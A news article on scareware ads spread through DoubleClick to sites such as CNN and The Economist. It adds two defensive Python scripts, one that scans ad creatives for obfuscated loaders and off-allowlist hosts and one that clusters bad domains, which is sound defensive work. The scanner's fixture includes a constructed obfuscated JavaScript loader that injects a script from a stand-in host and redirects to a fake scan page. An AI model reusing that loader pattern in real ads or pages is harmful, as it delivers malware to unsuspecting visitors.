Rogue anti-spyware software that pushes fraudulent PC scans has found its way onto DoubleClick and legitimate sites, including CNN, The Economist, The Huffington Post and the official site of the Philadelphia Phillies.
DoubleClick officials told eWEEK that they have recently implemented a security monitoring system to catch and disable a new strain of malware that has spread over the past several months. This system has already captured and disabled about 100 ads, the company said in a statement, although it didn't mention this episode in particular.
The bogus anti-spyware onslaught is only part of a bigger wave that has also included pornographic ads being swapped for normal ads on sites such as The Wall Street Journal. It's not yet clear whether the same fraudsters are behind both the porn and the fraudulent anti-spyware ads.
Sunbelt Software has confirmed that Trojans were being downloaded from ads served by DoubleClick as recently as Nov. 11. This malware is the kind that repeatedly pops bogus warning messages about computer infections in users' faces until they give up in despair and pay $30 to $40 for a junk "security" program.
"The stuff that's installed is this rogue anti-spyware software that … gives you fake alerts, [such as] 'Your computer is infected, you must run this.' Basically it's extortion. … They try to push you to buy their software," Sunbelt President Alex Eckelberry told eWEEK.
The malware application is a variant of WinFixer, a piece of malware that pretends to be a diagnostic tool.
These aren't Trojans that steal account information, but they are illegal under misleading-advertising and other statutes. "It just pummels you with these alerts that your machine is infected, your machine is infected. It just wears you down. It's not stealing information, it's not a virus. It just convinces you to spend $30 to $40 to buy their absolutely garbage application. Once it gets on your machine, it will pound you. Every time you start up your machine," it will pester users with bogus scareware warnings, Eckelberry said.
He said Sunbelt will be contacting the Federal Trade Commission Nov. 12.
The reach of DoubleClick, one of the Internet's largest online advertising services, is vast, to the extent that the scope of the impact is unknown. However, the only sites at risk are those that signed agreements with the advertiser that is distributing the malware in question, a German marketing company called AdTraff.
It's not DoubleClick that is ultimately responsible. DoubleClick is an ad-serving platform that only provides the technology used by publishers to deliver ads from advertisers with whom the publishers have signed agreements. DoubleClick does not deal directly with the advertisers, although it does attempt to protect its clients from malicious code masquerading as advertisements by checking the materials stored in its database.
"We view the security aspect as one part of our service, but we make it clear to [clients] that they have to do sufficient quality assurance," said Sean Harvey, senior product manager for DoubleClick's ad management platform. "They have to be checking with advertisers to make sure they're legitimate, and to make sure the creative is not malicious."
Recently, DoubleClick discovered one company in particular that was trying to sign direct deals with publishers. DoubleClick found that the rich media ad in question was clean but called an external file that would in turn call something else, in a “very creepy, encrypted kind of way,” Harvey said. “It was very hidden, very hard to see what was going on, and it would call [a] malware site.”
Because of that find, DoubleClick has since deployed a mechanism for scanning advertising material, not because it's responsible for the safety of the materials that customers store in its systems, Harvey said, but as a service to its customers and to protect its reputation.
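The chain Harvey describes, a clean-looking first hop that pulls an external file which in turn decodes and loads something else, is exactly what a creative scanner has to follow rather than merely pattern-match on the file the advertiser uploaded. The Python script below is an added example written for this article, not DoubleClick's scanner or anything Harvey described in detail; the creative, the three resources it loads, the host names, the allowlist and the in-memory FAKE_WEB dictionary that stands in for fetching are all constructed for the example.

```python
import re
from collections import deque
from urllib.parse import unquote, urlsplit

# Constructed in-memory stand-in for the web: URL -> body. These resources are made up
# for this example and imitate the pattern described above: a clean-looking creative
# pulls an external file, which hides a URL behind escapes and loads a third resource.
FAKE_WEB = {
    "http://ads.example-publisher.test/creative.html": (
        '<html><body><img src="http://cdn.example-publisher.test/banner.gif">'
        '<script src="http://cdn.example-publisher.test/richmedia.js"></script>'
        "</body></html>"
    ),
    "http://cdn.example-publisher.test/banner.gif": "GIF89a",  # placeholder image body
    # Second hop: the loader URL is percent-escaped and injected as a <script> at runtime.
    "http://cdn.example-publisher.test/richmedia.js": (
        'var u=unescape("'
        + "".join(f"%{ord(c):02X}" for c in "http://thirdparty-loader.test/l.js")
        + '");var s=document.createElement("script");s.src=u;document.body.appendChild(s);'
    ),
    # Third hop: off the publisher's infrastructure, and it redirects to the scare page.
    "http://thirdparty-loader.test/l.js": 'document.location="http://fake-scanner.test/alert.html";',
}
# Hosts the (hypothetical) advertiser declared up front; anything else is a finding.
ALLOWED_HOSTS = {"ads.example-publisher.test", "cdn.example-publisher.test"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>)]*)?")
OBFUSCATION_RE = re.compile(
    r"\b(?:unescape|eval)\s*\(|String\.fromCharCode\s*\(|(?:%[0-9A-Fa-f]{2}){8,}|(?:\\x[0-9A-Fa-f]{2}){8,}"
)
DYNAMIC_LOAD_RE = re.compile(r"createElement\s*\(\s*[\"']script|\blocation\s*=|document\.write\s*\(")


def deobfuscate(body):
    """Undo the cheap encodings ad loaders use to keep URLs out of a plain string search."""
    text = re.sub(
        r"String\.fromCharCode\(\s*([\d,\s]+)\)",
        lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"',
        body,
    )
    text = re.sub(r"(?:%[0-9A-Fa-f]{2})+", lambda m: unquote(m.group(0)), text)
    text = re.sub(r"(?:\\x[0-9A-Fa-f]{2})+",
                  lambda m: m.group(0).encode("ascii").decode("unicode_escape"), text)
    return text


def extract_urls(body):
    """Absolute URLs visible in the body after decoding, in order of first appearance."""
    urls = []
    for m in URL_RE.finditer(deobfuscate(body)):
        if m.group(0) not in urls:
            urls.append(m.group(0))
    return urls


def audit_creative(start_url, fetch, allowed_hosts, max_depth=5):
    """Breadth-first walk of everything the creative can reach; records each hop and issue."""
    hops, findings, visited = [], [], set()
    queue = deque([(start_url, 0, [start_url])])
    while queue:
        url, depth, chain = queue.popleft()
        if url in visited or depth > max_depth:
            continue
        visited.add(url)
        hops.append({"url": url, "depth": depth, "chain": chain})
        host = urlsplit(url).hostname or ""
        if host not in allowed_hosts:
            findings.append({"url": url, "issue": "off-allowlist host", "chain": chain})
        body = fetch(url)
        if body is None:  # could not retrieve; still worth a note, the chain ends here
            findings.append({"url": url, "issue": "unresolvable", "chain": chain})
            continue
        if OBFUSCATION_RE.search(body):
            findings.append({"url": url, "issue": "obfuscated loader", "chain": chain})
        if DYNAMIC_LOAD_RE.search(body):
            findings.append({"url": url, "issue": "dynamic load or redirect", "chain": chain})
        for child in extract_urls(body):
            queue.append((child, depth + 1, chain + [child]))
    return {"hops": hops, "findings": findings}


def verdict(report):
    """Block on the two signals that matter; dynamic loading alone is common in rich media."""
    blocking = {"off-allowlist host", "obfuscated loader"}
    return "disable" if any(f["issue"] in blocking for f in report["findings"]) else "serve"


if __name__ == "__main__":
    report = audit_creative("http://ads.example-publisher.test/creative.html", FAKE_WEB.get, ALLOWED_HOSTS)
    for f in report["findings"]:
        print(f["issue"], "->", " -> ".join(f["chain"]))
    print("verdict:", verdict(report))
```

A scan of only the uploaded creative sees two resources on the advertiser's own CDN and nothing else; the decoding step is what exposes the third and fourth hops. Real creatives (Flash in 2007, HTML5 today) need a proper parser and, for decoders that are arbitrary JavaScript, execution in an instrumented browser; the static pass here catches the cheap encodings and, more importantly, flags any hop that leaves the hosts the advertiser declared, which is the check a publisher can run before a creative goes live.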
The sites involved—The Economist and the others—are ultimately responsible for any malicious code delivered through their ads or sites.
eWEEK's publisher, Ziff Davis Enterprise, is a DoubleClick customer. ZDE's networks have not been infected with the ads, most of which are associated with affiliate marketers.
On Nov. 12, Web sites' marketing professionals were flooding industry e-mail lists with reports of complaints from readers that they have been receiving inappropriate ads. Marketing professionals have complained of their ad servers being "hijacked" at sites including The Wall Street Journal, Discovery and BizJournals. It's not that the servers have been hijacked, Harvey said, but rather that a toolbar or some other mechanism on the user's machine is overlaying the intended ad with inappropriate content.
“It looks like we are all in the same boat,” one marketer said in a message to the mailing list.
Another marketer said his company had already shut down one of its networks that was devoted to serving up ads and had suspended all third-party ads on another site.
It's not clear yet whether all the sites are having the same problem, given that some sites are delivering the bogus anti-spyware and others are experiencing normal ads being replaced with ads for porn or other inappropriate material.
As for the bogus anti-spyware code, its origin is the German company AdTraff.com. AdTraff had not responded to inquiries as of the time this article posted. Google, which has proposed a $3.1 billion buyout of DoubleClick, declined to comment.
Harvey said in a statement that this is “an industry-wide challenge; unfortunately, there are bad actors who misrepresent themselves and purchase advertising as an avenue to distribute malware. This has the potential to affect all businesses and consumers in the online environment.”
Even as DoubleClick monitors its online environment for malware—it has a dedicated team that works around the clock on the issue—malware writers are working to adapt to its new security measures, Harvey said in the statement.
“As with any system (Norton, McAfee, etc.) designed to root out bad actors, there are going to be times when the bad actors are a step ahead—when this occurs, we immediately cease serving the infected ads, and then work to refine our system so that similar ads are captured and disabled before they are ever served (just like when Norton provides a patch in response to a new threat),” the statement said.
DoubleClick has alerted its clients, particularly publishing clients, of the need to pay close attention to the advertisers, agencies and networks with which they work.
When clicked on, the bogus anti-spyware ad presents in the lower right-hand screen corner a dialog box informing users that their computer is infected and that they need to download a scanner immediately.
Warning: if you click the following link, do not click "OK" in any dialog box; instead, simply close the browser window. This is a link to the bogus infection scan that's presented to victims. Eckelberry said that the Trojan consistently reports that malware has been found even on systems known to the security firm to be perfectly clean.
Sunbelt and other security researchers see this type of misleading ad, which uses convincing warning dialog boxes that look like legitimate Windows messages, on a regular basis.
Adam Thomas, a researcher at Sunbelt, said the IP address for the AdTraff.com ads overlaps with those used by Innovative Marketing, which has a long history of misleading users on the Internet. AdTraff.com's domain registration also lists the same Yahoo.com e-mail address as Innovative Marketing, Thomas said.
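Thomas's two pivots, overlapping IP space and a shared registrant e-mail, are the standard way to expand one known-bad advertiser into the rest of the infrastructure it operates, so that a publisher blocks the whole cluster rather than a single domain. The script below is an added example written for this article, not Sunbelt's analysis; the domains, addresses and e-mail in RECORDS are placeholders invented for it and say nothing about AdTraff or Innovative Marketing.

```python
from collections import defaultdict

# Constructed sample: for each domain, the addresses it resolved to and the e-mail in its
# registration record. All values are placeholders made up for this example.
RECORDS = {
    "promo-loader.test": {"ips": {"198.51.100.20"}, "registrant": "ops-mailbox@mail.test"},
    "quickscan-alerts.test": {"ips": {"198.51.100.21"}, "registrant": "ops-mailbox@mail.test"},
    "cheap-pcfix.test": {"ips": {"198.51.100.21", "203.0.113.5"}, "registrant": "billing@other.test"},
    "unrelated-news.test": {"ips": {"192.0.2.10"}, "registrant": "hostmaster@news.test"},
}
KNOWN_BAD = {"quickscan-alerts.test"}  # the one domain an analyst already confirmed


class DisjointSet:
    """Union-find over domain names; two domains end up in one set if any pivot links them."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def index_pivots(records):
    """Invert the records: which domains share each IP, which share each registrant."""
    by_ip, by_registrant = defaultdict(set), defaultdict(set)
    for domain, rec in records.items():
        for ip in rec["ips"]:
            by_ip[ip].add(domain)
        by_registrant[rec["registrant"]].add(domain)
    return by_ip, by_registrant


def cluster(records):
    """Link every pair of domains that shares a pivot value and remember why."""
    ds, reasons = DisjointSet(), defaultdict(list)
    by_ip, by_registrant = index_pivots(records)
    for label, index in (("shared IP", by_ip), ("shared registrant", by_registrant)):
        for value, domains in index.items():
            ordered = sorted(domains)
            if len(ordered) < 2:
                continue
            first = ordered[0]
            for other in ordered[1:]:
                ds.union(first, other)
                reasons[first].append(f"{label} {value} with {other}")
                reasons[other].append(f"{label} {value} with {first}")
    return ds, reasons


def expand_blocklist(records, known_bad):
    """Every domain in the same cluster as a confirmed-bad one, with the evidence per domain."""
    ds, reasons = cluster(records)
    bad_roots = {ds.find(d) for d in known_bad}
    linked = {d for d in records if ds.find(d) in bad_roots}
    return linked, {d: reasons.get(d, []) for d in linked}


if __name__ == "__main__":
    linked, evidence = expand_blocklist(RECORDS, KNOWN_BAD)
    for domain in sorted(linked):
        print(domain, "<-", "; ".join(evidence[domain]) or "seed")
```

The union is transitive on purpose: here the confirmed domain is tied to one neighbour by an address and to another by the registrant, and the result is a cluster of three. That is also the caveat. A shared address on a hosting provider joins unrelated tenants, so an IP pivot is a lead to verify against the registrant, the ad creative and the payload, not a verdict on its own; the evidence list exists so a reviewer can see which link each domain came in on.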
“These guys are just slimy advertising guys,” Eckelberry said.
Ad hijacking is a constant problem, Eckelberry said. That makes it essential that online publishers and others who serve ads vet the advertisers to whom they hand their space, and their visitors' eyeballs.
Editor's Note: This story was updated to include comments from Sean Harvey, to correct its original depiction of DoubleClick's culpability and to clarify Web publishers' culpability in serving malicious code.